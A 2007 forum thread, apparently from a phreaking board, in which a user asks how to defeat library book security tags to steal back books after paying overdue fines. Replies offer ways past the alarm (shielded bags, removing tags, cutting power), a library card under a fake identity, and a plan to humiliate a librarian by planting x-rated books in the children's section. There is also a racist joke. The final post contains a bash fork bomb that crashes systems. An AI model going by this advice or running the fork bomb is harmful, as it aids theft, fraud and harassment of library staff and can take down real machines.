Author Topic: FUN WITH MAGNETS dirty old librarians  (Read 5495 times)

Offline snottyp

• Newb
  • 1337 13V3L: +0/-2
FUN WITH MAGNETS dirty old librarians
« on: July 21, 2007, 10:59:01 PM »
so these books, that inevitably wound up in the trunk of my car were left out of the library a wee bit later than expected and ended up costing me 85 bucks in fees.  and i didnt even get to keep the books! iv been looking around online and tinkering with electromagnets and have concluded that i could somehow go in, desensitize my books and rescue them back to me! i usually wouldn't prank a library by taking my books back, but they were huuuge assholes and insisted i pay this lovely amount of money to reimburse them for all the  emotional trauma i have caused them.  well i was thinking if i built an electro magnet strong enough i could just render the alarm useless.  the books use magnet strip sensors in their bindings (EM tags) http://www.vernonlibrarysupplies.com/cgi-bin/vernlib.cgi/TAILTAG.html .  By magnetizing the spin of the book i think i could prevent the alarm to go off when i leave.  What do you guys think?? how big of a battery do you think i should use, or which side of the electromagnet would desensitize it? north or south??  good luck!

snott
« Last Edit: July 21, 2007, 11:04:10 PM by snottyp »

Offline mrpeanut

• PLA Soldier
  • 1337 13V3L: +32/-30
Re: FUN WITH MAGNETS dirty old librarians
« Reply #1 on: July 21, 2007, 11:10:07 PM »
line a bookbag with anti-matter

Offline trevelyn

• Administrator
  • Elite Cactus Squad
  • Ninja Phone Loser
  • 1337 13V3L: +183/-22
  • He likes cans and taking pictures in cans!
    • WeakNet Labs
« Reply #2 on: July 22, 2007, 01:22:16 PM »
when you leave just lift them over your head over the sensors, it works in Barnes and Noble.

Offline rbcp

• Head Custodian
  • Administrator
  • Ninja Phone Loser
  • 1337 13V3L: +454/-81
  • I'm not stupid! I'm not stupid! Hematology!
    • Homepage
« Reply #3 on: July 22, 2007, 01:39:12 PM »
Is it possible to just rip the alarm tag out of the spine?  Or unplug the door alarm things?  Or have a friend out in back cut the power lines into the library?

Offline mr_doc

• Supergluer of coins
  • PLA Junkie
  • 1337 13V3L: +71/-24
    • PLA LotGD
« Reply #4 on: July 22, 2007, 03:22:25 PM »
so these books, that inevitably wound up in the trunk of my car were left out of the library a wee bit later than expected and ended up costing me 85 bucks in fees.  and i didnt even get to keep the books! iv been looking around online and tinkering with electromagnets and have concluded that i could somehow go in, desensitize my books and rescue them back to me! i usually wouldn't prank a library by taking my books back, but they were huuuge assholes and insisted i pay this lovely amount of money to reimburse them for all the  emotional trauma i have caused them.  well i was thinking if i built an electro magnet strong enough i could just render the alarm useless.  the books use magnet strip sensors in their bindings (EM tags) http://www.vernonlibrarysupplies.com/cgi-bin/vernlib.cgi/TAILTAG.html .  By magnetizing the spin of the book i think i could prevent the alarm to go off when i leave.  What do you guys think?? how big of a battery do you think i should use, or which side of the electromagnet would desensitize it? north or south??  good luck!

snott

You wanted the books, yet gave them back to a public library AND paid 85 dollars to do so. The library has already won.
PLAlotgd  -If you play, I will hate you a little less.
Unnamed Forums

Offline MIB

• Senior Racketeering Officer
  • PLA Army
  • 1337 13V3L: +32/-12
  • PLA- phreak tested. Phone company approved
« Reply #5 on: July 22, 2007, 04:31:07 PM »
If you want to get even, get the name of the person who made you return the books and pay the money to do so.

Next step is to have some professional looking stickers or nameplates made up that says,

This book has been donated to the East Goatse Library by Asshole J. Librarian

Stick these stickers on some raunchy x-rated books. Then infiltrate them into the children's section. Sit back and wait for someone to discover the "donated" books.

Maybe you can embellish more by alerting the TV stations and newspapers in your area after the shit hits the fan.

MIB
oɔıxǝɯ ʍǝu uı ʎoɹ ɯoɹɟ pɹɐoqʎǝʞ ɐ ʎnq ɹǝʌǝu

Offline Tachyon

• Minister of Defence
  • OMG Mod
  • Ninja Phone Loser
  • 1337 13V3L: +125/-62
« Reply #6 on: July 22, 2007, 05:14:49 PM »
I'm pretty sure that a bag lined with material like tinfoil would work as well, if you sealed it up tightly (like my RFID-blocking wallet).
Do you speak two languages?

"Detective Don Gombo: IM AFRAID THE ONLY ONE "F" IS "U" MY FRIEND. WELCOME TO THE CRIMINAL JUSTICE WEB!"

Offline frog

• Defender of the Forums, Speaks Two Languages
  • PLA Henchman
  • 1337 13V3L: +148/-48
  • Ribbit.
« Reply #7 on: July 22, 2007, 05:49:56 PM »
Wear a mask.
To see this post in braille, click here.

Offline rbcp

• Head Custodian
  • Administrator
  • Ninja Phone Loser
    • Homepage
« Reply #8 on: July 22, 2007, 05:50:52 PM »
A library card probably isn't too hard to acquire.  You just need a utility bill and some kind of photo ID.  You could come up with something that would work.  Then just check them all out again under a fake name.  How many books did you have checked out?  And how overdue were they?  Were they even worth $85?

If you want revenge against the librarian, I don't see how stealing the books back even affects her.  She's not going to care if the books are missing so you're only depriving other visitors in the library access to the books.  Also, it's your own fault that they were late.  Everyone knows that there are fines for overdue books and that if you don't return them on time, you pay the fines.  In a way, your $85 is helping to pay for your local library, which has given you free access to books your entire life.  Not that I'm trying to pretend that I have morals, but I'm just sayin...

Offline snottyp

• Newb
  • 1337 13V3L: +0/-2
« Reply #9 on: July 22, 2007, 09:55:56 PM »
yeah, i just want my books back

Offline mrpeanut

• PLA Soldier
  • 1337 13V3L: +32/-30
« Reply #10 on: July 23, 2007, 12:36:02 PM »
did you try asking nicely for the books?

Offline mr_doc

• Supergluer of coins
  • PLA Junkie
  • 1337 13V3L: +71/-24
    • PLA LotGD
« Reply #11 on: July 23, 2007, 02:36:43 PM »
Put frogs in the book return slot
PLAlotgd  -If you play, I will hate you a little less.
Unnamed Forums

Offline rbcp

• Head Custodian
  • Administrator
  • Ninja Phone Loser
    • Homepage
« Reply #12 on: July 23, 2007, 03:42:46 PM »
yeah, i just want my books back

How many books?  What kind of books were they?  WE NEED DETAILS.

Offline Raptor

• OMG MOD wannabe
  • Ninja Phone Loser
  • 1337 13V3L: +80/-52
  • We can be happy underground
« Reply #13 on: July 23, 2007, 03:50:01 PM »
I think by "Books", he means Crack Cocaine, and by "Library", he means an Alleyway, and by "Librarians" he means minorities.
Raptor\\\'s Random Reviews!

http://www.phonelosers.org/forums/index.php?board=30.0

Offline RijilV

• :)
  • PLA Guru
  • 1337 13V3L: +30/-7
« Reply #14 on: July 29, 2007, 10:28:37 PM »
so these books, that inevitably wound up in the trunk of my car were left out of the library a wee bit later than expected and ended up costing me 85 bucks in fees.  and i didnt even get to keep the books! iv been looking around online and tinkering with electromagnets and have concluded that i could somehow go in, desensitize my books and rescue them back to me! i usually wouldn't prank a library by taking my books back, but they were huuuge assholes and insisted i pay this lovely amount of money to reimburse them for
snott

You do realize this is basically the opposite of software piracy..

yeah, those fees are high, but hey, information should be free, and believe me, they're not going to replace the books you steal..
Code: [Select]
#!/bin/bash
:() { :|:& };: